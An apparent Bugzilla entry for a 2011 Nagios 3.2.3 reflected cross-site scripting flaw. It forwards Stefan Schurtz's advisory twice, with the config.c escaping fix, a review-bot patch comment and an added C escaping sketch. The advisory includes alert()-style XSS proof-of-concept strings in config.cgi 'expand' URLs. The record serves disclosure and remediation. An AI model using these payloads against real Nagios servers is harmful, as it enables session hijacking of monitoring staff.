Bugzilla – Bug 698171
VUL-0: nagios: Cross-Site Scripting vulnerability in Nagios
Last modified: 2011-06-08 14:06:35 UTC
Hi.
There is a security bug in package 'nagios'.
This bug is public.
There is no coordinated release date (CRD) set.

Original posting:

Begin forwarded message:

> From: sschurtz@t-online.de
> Date: 1 June 2011 16:38:05 CEST
> To: bugtraq@securityfocus.com
> Subject: Cross-Site Scripting vulnerability in Nagios
>
> Advisory: Cross-Site Scripting vulnerability in Nagios
> Advisory ID: SSCHADV2011-006
> Author: Stefan Schurtz
> Affected Software: Successfully tested on: nagios 3.2.3
> Vendor URL: http://www.nagios.org
> Vendor Status: informed
> CVE-ID: -
>
> ==========================
> Vulnerability Description:
> ==========================
>
> This is a Cross-Site Scripting vulnerability
>
> ==================
> Technical Details:
> ==================
>
> No input validation for "expand" in config.c(gi)
>
> View Config -> Command Expansion -> To expand -> <script>alert(String.fromCharCode(88,83,83))</script>
> View Config -> Command Expansion -> To expand -> <body onload=alert(666)>
>
> or
>
> http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
> http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>
>
> =========
> Solution:
> =========
>
> in config.c
>
> < printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD CLASS='dataEven'>%s",command_args[0]);
>
>> printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD CLASS='dataEven'>%s",escape_string(command_args[0]));
>
> ====================
> Disclosure Timeline:
> ====================
>
> 01-Jun-2011 - informed developers
> 01-Jun-2011 - Release date of this security advisory
> 01-Jun-2011 - post on BugTraq and Full-disclosure
>
> ========
> Credits:
> ========
>
> Vulnerability found and advisory written by Stefan Schurtz.
>
> ===========
> References:
> ===========
>
> http://www.nagios.org
> http://tracker.nagios.org/view.php?id=224
> http://www.rul3z.de/advisories/SSCHADV2011-006.txt
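
Review bot: the replacement printf passes escape_string(command_args[0]) straight to %s, so its return value is neither checked nor kept. If escape_string can return NULL, or hands back a buffer the caller must free, assign the result to a local first, print that, and release it as the function's contract requires. The hunk also touches only the "To expand:" cell; any other statement in config.c that prints command_args[0] or the expanded command line needs the same encoding.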
Cross-Site Scripting vulnerability in Nagios

From: sschurtz () t-online de
Date: Wed, 1 Jun 2011 08:38:05 -0600

Advisory: Cross-Site Scripting vulnerability in Nagios
Advisory ID: SSCHADV2011-006
Author: Stefan Schurtz
Affected Software: Successfully tested on: nagios 3.2.3
Vendor URL: http://www.nagios.org
Vendor Status: informed
CVE-ID: -

==========================
Vulnerability Description:
==========================

This is a Cross-Site Scripting vulnerability

==================
Technical Details:
==================

No input validation for "expand" in config.c(gi)

View Config -> Command Expansion -> To expand -> <script>alert(String.fromCharCode(88,83,83))</script>
View Config -> Command Expansion -> To expand -> <body onload=alert(666)>

or

http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/nagios/cgi-bin/config.cgi?type=command&expand=<body onload=alert(666)>

=========
Solution:
=========

in config.c

< printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD CLASS='dataEven'>%s",command_args[0]);

printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD CLASS='dataEven'>%s",escape_string(command_args[0]));

====================
Disclosure Timeline:
====================

01-Jun-2011 - informed developers
01-Jun-2011 - Release date of this security advisory
01-Jun-2011 - post on BugTraq and Full-disclosure

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.nagios.org
http://tracker.nagios.org/view.php?id=224
http://www.rul3z.de/advisories/SSCHADV2011-006.txt
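
The advisory's "no input validation for expand" finding comes down to a request parameter being written into HTML without output encoding. The sketch below is an added example, not code from the advisory or from Nagios: html_escape_demo and render_expand_cell are hypothetical names, and the helper stands in for whatever escape_string does in the Nagios tree.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* html_escape_demo(): hypothetical helper for this example, NOT Nagios's
 * escape_string(). Returns a malloc'd, entity-encoded copy of `in`, or NULL
 * on error; the caller frees it. */
char *html_escape_demo(const char *in)
{
    size_t len;
    char *out, *w;
    if (in == NULL || (len = strlen(in)) > ((size_t)-1 - 1) / 6)
        return NULL;
    out = w = malloc(len * 6 + 1);      /* longest entity, &quot;, is 6 bytes */
    if (out == NULL)
        return NULL;
    for (; *in; in++) {
        switch (*in) {
        case '&':  w += sprintf(w, "&amp;");  break;
        case '<':  w += sprintf(w, "&lt;");   break;
        case '>':  w += sprintf(w, "&gt;");   break;
        case '"':  w += sprintf(w, "&quot;"); break;
        case '\'': w += sprintf(w, "&#39;");  break;
        default:   *w++ = *in;                break;
        }
    }
    *w = '\0';
    return out;
}

/* Build the "To expand:" cell in buf; 0 on success, -1 on error or truncation. */
int render_expand_cell(char *buf, size_t size, const char *expand)
{
    char *safe = html_escape_demo(expand);
    int n;
    if (safe == NULL)
        return -1;
    n = snprintf(buf, size, "<TD CLASS='dataEven'>%s</TD>", safe);
    free(safe);
    return (n < 0 || (size_t)n >= size) ? -1 : 0;
}

int main(void)
{
    char cell[256];   /* input below is the string quoted in the advisory */
    if (render_expand_cell(cell, sizeof cell, "<body onload=alert(666)>") == 0)
        puts(cell);
    return 0;
}
```

The encoding shown is for HTML text content only; a value placed in an attribute, URL or script context needs the encoding for that context.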
dup *** This bug has been marked as a duplicate of bug 697895 ***